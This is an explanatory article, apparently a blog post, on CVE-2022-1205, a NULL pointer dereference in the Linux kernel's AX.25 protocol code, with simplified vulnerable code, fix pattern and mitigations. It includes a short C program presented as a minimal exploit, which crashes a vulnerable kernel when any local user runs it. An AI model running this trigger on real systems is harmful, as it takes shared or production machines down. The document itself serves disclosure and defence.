In early 2022, a security flaw was discovered in the Linux kernel's implementation of AX.25, the protocol used for amateur (ham) radio packet communications. The vulnerability, tracked as CVE-2022-1205, is a NULL pointer dereference that lets a local, unprivileged user crash the system (a kernel oops, or a full panic depending on configuration). In this article we'll dig into the details of the vulnerability, review some simplified code snippets, follow the logic of the trigger, and provide references for further reading.

What is AX.25?

AX.25 is the primary link-layer protocol used by amateur radio operators for digital data transmission, typically over packet radio. The Linux kernel ships it as an optional networking component (CONFIG_AX25), usually built as a module. Most users never touch it, but it is handy for ham radio setups, and on distribution kernels it is often present even when unused.

Where is the Flaw?

The flaw sits in how the Linux kernel's AX.25 code handles connections. Specifically, it does not check that a pointer it relies on is still valid before using it, which can lead to a NULL pointer dereference in kernel context. That produces a kernel oops; if panic_on_oops is set (the default on many server distributions) the whole machine goes down. Either way the result is a denial of service (DoS).

Security Advisory

Here’s an official description from Red Hat Bugzilla 2060964:

> "A NULL pointer dereference flaw was found in the Linux kernel’s Amateur Radio AX.25 protocol functionality in the way a user connects with the protocol. This flaw allows a local user to crash the system."

Let's look at the vulnerable pattern. The sketch below is a simplified illustration of the code in net/ax25/af_ax25.c, with unrelated validation and setup omitted; it shows the shape of the bug rather than the literal upstream source.

static int ax25_connect(struct socket *sock, struct sockaddr *uaddr,
                        int addr_len, int flags)
{
    struct sock *sk = sock->sk;
    ax25_cb *ax25;
    /* ... address validation and other setup omitted ... */

    ax25 = ax25_find_cb(...);   /* returns NULL when no matching control block exists */

    /* ... intervening code removed for clarity ... */

    /* UNSAFE: ax25 is used without checking it for NULL */
    ax25->sk = sk;              /* NULL dereference here crashes the kernel */
    /* ... */
}

The ax25_find_cb() function returns NULL when no control block matches the requested conditions. Because the code never checks whether ax25 is NULL before using it, the first dereference (here ax25->sk = sk;) faults inside the kernel and triggers an oops, or a panic if the system is configured to panic on oops.

How Can the Vulnerability Be Triggered?

An unprivileged local user can create an AX.25 socket and attempt to connect with parameters chosen so that the kernel fails to find the relevant control block (the lookup returns NULL). The kernel then dereferences the NULL pointer and crashes. No special capabilities are needed: creating an AF_AX25 socket is allowed for any user, and if AX.25 is built as a module and not blacklisted, the socket() call itself makes the kernel auto-load it.

Example: Minimal Exploit Code

Below is a simple C program that will try to crash a vulnerable Linux kernel when run by an unprivileged user. It requires AX.25 support to be built in or loadable as a module.

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/ax25.h>

int main(void) {
    /* AF_AX25 needs CONFIG_AX25; if built as a module and not blacklisted,
     * the kernel auto-loads it on this call. */
    int sockfd = socket(AF_AX25, SOCK_SEQPACKET, 0);
    if (sockfd < 0) {
        perror("socket");
        return 1;
    }

    struct sockaddr_ax25 addr;
    memset(&addr, 0, sizeof(addr));
    addr.sax25_family = AF_AX25;
    addr.sax25_ndigis = 0;
    /* Intentionally invalid call sign: raw ASCII rather than the shifted
     * AX.25 encoding, copied into the 7-byte ax25_call field (no NUL). */
    memcpy(addr.sax25_call.ax25_call, "NOCALL-",
           sizeof(addr.sax25_call.ax25_call));

    /* On a vulnerable kernel this connect() is the trigger */
    if (connect(sockfd, (struct sockaddr *)&addr, sizeof(addr)) < 0)
        perror("connect");

    close(sockfd);
    return 0;
}

*Disclaimer: Running this on a vulnerable system will crash it! Use only on test systems.*

The fix follows the usual pattern for this class of bug: validate the pointer before it is dereferenced and fail the operation cleanly instead of crashing. In the simplified form matching the sketch above:

if (!ax25)
    return -ENOTCONN;

The upstream commits referenced by the CVE record are "ax25: fix NPD bug in ax25_disconnect" and "ax25: Fix NULL pointer dereferences in ax25 timers"; the upstream changes check the pointer before use and hold the socket lock so the check stays valid, while the snippet above shows only the shape of the check, not the literal diff.
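To make the before/after concrete, here is an added user-space model of the pattern, written for this article and not taken from the kernel or the upstream commit. It stands in for the vulnerable sketch above and for the fix: a small table of control blocks plays the role of the AX.25 control-block list, find_cb() models ax25_find_cb() returning NULL on a miss, and connect_unchecked() versus connect_checked() show the unguarded and guarded dereference. The struct names, the call signs in the table and the connect_* helpers are all hypothetical.

```c
/* Added illustration, not kernel code: a user-space model of the
 * "look up a control block, then dereference it without checking"
 * pattern the article describes, next to the hardened form. */
#include <errno.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical stand-ins for the kernel's struct sock and ax25_cb. */
struct sock { int id; };
struct ax25_cb {
    char call[7];       /* peer call sign, plain ASCII here for simplicity */
    struct sock *sk;    /* owning socket, NULL until a socket is attached */
};

/* Constructed table of control blocks, playing the role of the
 * kernel's ax25_list. The call signs are made up for this example. */
static struct ax25_cb cb_table[] = {
    { "VE3ABC", NULL },
    { "W1AW-1", NULL },
};
#define CB_COUNT (sizeof cb_table / sizeof cb_table[0])

/* Model of ax25_find_cb(): returns NULL when no block matches. */
struct ax25_cb *find_cb(const char *call)
{
    for (size_t i = 0; i < CB_COUNT; i++)
        if (strncmp(cb_table[i].call, call, sizeof cb_table[i].call) == 0)
            return &cb_table[i];
    return NULL;
}

/* Vulnerable shape: trusts the lookup result. With an unknown call sign
 * this dereferences NULL, the user-space equivalent of the kernel oops. */
int connect_unchecked(struct sock *sk, const char *call)
{
    struct ax25_cb *ax25 = find_cb(call);
    ax25->sk = sk;              /* UNSAFE when ax25 == NULL */
    return 0;
}

/* Hardened shape: the lookup result is validated before use and the
 * miss is reported to the caller, mirroring the -ENOTCONN check above. */
int connect_checked(struct sock *sk, const char *call)
{
    struct ax25_cb *ax25 = find_cb(call);
    if (!ax25)
        return -ENOTCONN;
    ax25->sk = sk;
    return 0;
}

int main(void)
{
    struct sock s = { 42 };
    printf("connect_checked(known)   -> %d\n", connect_checked(&s, "VE3ABC"));
    printf("connect_checked(unknown) -> %d\n", connect_checked(&s, "NOCALL-"));
    /* connect_unchecked(&s, "NOCALL-") would segfault here; left uncalled. */
    return 0;
}
```

The interesting property is not the check itself but where it sits: it must be evaluated on the same pointer that is about to be dereferenced, with nothing in between that can change it. That is why the upstream fix pairs the check with the socket lock, and why in the kernel a lookup that "can't fail" still needs its NULL path handled.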

Mitigation

- Update to a kernel that carries the upstream fixes; that is the only real remedy.
- If you don't need amateur radio on the system, prevent the ax25 module from loading at all (a modprobe blacklist or install rule in /etc/modprobe.d), then confirm with lsmod that it is not resident. Unloading it once is not enough, since any user can trigger auto-loading simply by creating an AF_AX25 socket.
- Regularly monitor the Linux kernel mailing list and your distribution's kernel security advisories.

References

- Red Hat Bugzilla: CVE-2022-1205
- Kernel.org Patch Commit
- NIST NVD Record
- AX.25 Wikipedia

Conclusion

While CVE-2022-1205 doesn't give an attacker root privileges or let them run arbitrary code, the ability of any local user to take a machine down is serious in shared or multi-tenant environments. Keep your systems updated, and disable rarely used network protocols like AX.25 when they're not in use. If you're a Linux system administrator, pay close attention to kernel advisories, especially for modules that are present on your kernel but that nobody actually uses.

Timeline

Published on: 08/31/2022 16:15:00 UTC
Last modified on: 09/06/2022 19:33:00 UTC